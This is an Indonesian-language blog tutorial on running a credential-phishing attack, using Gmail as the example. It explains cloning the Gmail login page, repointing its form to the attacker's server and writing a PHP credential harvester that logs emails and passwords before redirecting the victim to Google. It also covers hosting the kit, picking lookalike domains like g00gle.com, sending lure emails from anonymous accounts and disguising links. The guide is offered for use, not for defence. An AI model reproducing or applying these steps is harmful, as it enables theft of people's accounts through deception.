Cara Kerja Pishing
Tutorial ini akan menjelaskan cara membuat halaman login palsu untuk Pishing, dalam hal ini kita akan pergi dengan Gmail sebagai contoh. Prosedur ini bisa digunakan untuk membuat halaman palsu untuk website lain dengan cara yang sama. Yahoo !, Facebook, Myspace - Situs manapun yang sobat inginkan bisa dibuat dengan menggunakan tutorial ini.
Cara Membuat halaman Phising
1. Pergi ke situs gmail.com. Klik kanan di manapun dan Save the Page sebagai file HTML.
2. Setelah sobat menyimpan halaman login Gmail sepenuhnya, sobat akan melihat file HTML dan folder dengan nama sesuatu seperti Email dari file google. Ada dua file gambar yaitu "google_transparent.gif" dan "mail.logo.png" tanpa tanda kutip.
3. Sekarang kita perlu mengupload gambar-gambar ini ke situs web hosting gambar online seperti
Tinypic.com
Postimage.com
Photobucket.com
Setelah mengunggah, buka gambar tempat sobat menguploadnya dan salin URL (link) masing-masing gambar.
4. Buka file HTML di editor teks seperti NotePad dan MsWord (saya rekomendasiin NotePad, karena gampang digunakan dan tidak berat). (sobat bisa menggunakan CTRL + F untuk hal berikut) - Cari "google_transparent.gif" (tanpa tanda kutip) dan ganti dengan URL yang sesuai. Cari "mail.logo.png" (tanpa tanda kutip) dan ganti dengan URL yang sesuai.
5. Dalam file yang sama, cari:
action='https: //www.google.com/accounts/ServiceLoginAuth',
dan ganti dengan
action='http: // situsanda.com/login.php'
(tanpa tanda kutip dan sobat harus menulis URL situs palsu sobat di sana, lihat langkah 7 untuk membuatnya).Sekarang, simpan filenya dengan nama index.html
6. Sekarang sobat perlu membuat file PHP yang disebut "login.php". Jadi buka text editor (seperti NotePad) dan ketik berikut (sobat bisa langsung copas aja):
<? Php $ handle = fopen ("password.txt", "a");
fwrite ($handle,$_POST ["Email"]);
fwrite ($handle,"\n");
fwrite ($handle,$_POST ["Passwd"]);
fwrite ($handle,"\n");
fwrite ($handle,"\n");
fclose ($handle) ;
header("Location:https://www.google.com/accounts/ServiceLoginAuth");
exit;
?>
Sekarang simpan filenya dengan nama "login.php (tanpa tanda kutip tentunya).
7. Buka NotePad lagi dan langsung saja simpan filenya dengan nama "passwd.txt" tanpa konten apapun (file kosong).
Sekarang upload ketiga file tersebut yaitu (index.html, login.php, passwd.txt) di subdomain Web Hosting Site manapun. (Catatan: bahwa Situs Web Hosting harus memiliki fitur php). Sobat bisa menggunakan situs berikut:
110mb.com
Spam.com
Justfree.com
007sites.com
(Atau sobat bisa ngegoogle, banyak banget disana)
Ikuti petunjuk di Situs Web Hosting dan siapkan halaman login palsu sobat. Pastikan sobat memberi nama URL itu seperti g00gle.com atau apapun yang menurut sobat paling tidak mencurigakan. (Pastikan URL tidak menonjol di address bar karena bisa mengingatkan korban).
8. Buat akun email palsu, jika sobat lebih suka mengirim link halaman pishing secara anonim.
9. Dan sekarang yang harus sobat lakukan adalah mengirim sesuatu seperti "Gmail memulai fitur baru: Untuk menggunakan layanan ini, masuk ke halaman ini", bersama dengan ini kirim link ke situs web palsu sobat.
Catatan
Catatan: Agar pengguna meyakini perubahan URL halaman web domain pishing sobat, gunakan situs URL singkat gratis seperti: co.nr, co.cc, cz.cc ini akan membuat pengguna meyakini bahwa itu adalah URL yang benar. (Tapi nggak diganti juga nggak apa apa sih).
Nah, mudah bukan, sobat bisa melakukan pishing ini di website apapun selain google, seperti yahoo, bing, Facebook, Instagram, dan teman temannya.
Sekian dari saya. Salam Hax
Kunjungi juga website saya >>
http://cuplistech.blogspot.com/
0 Komentar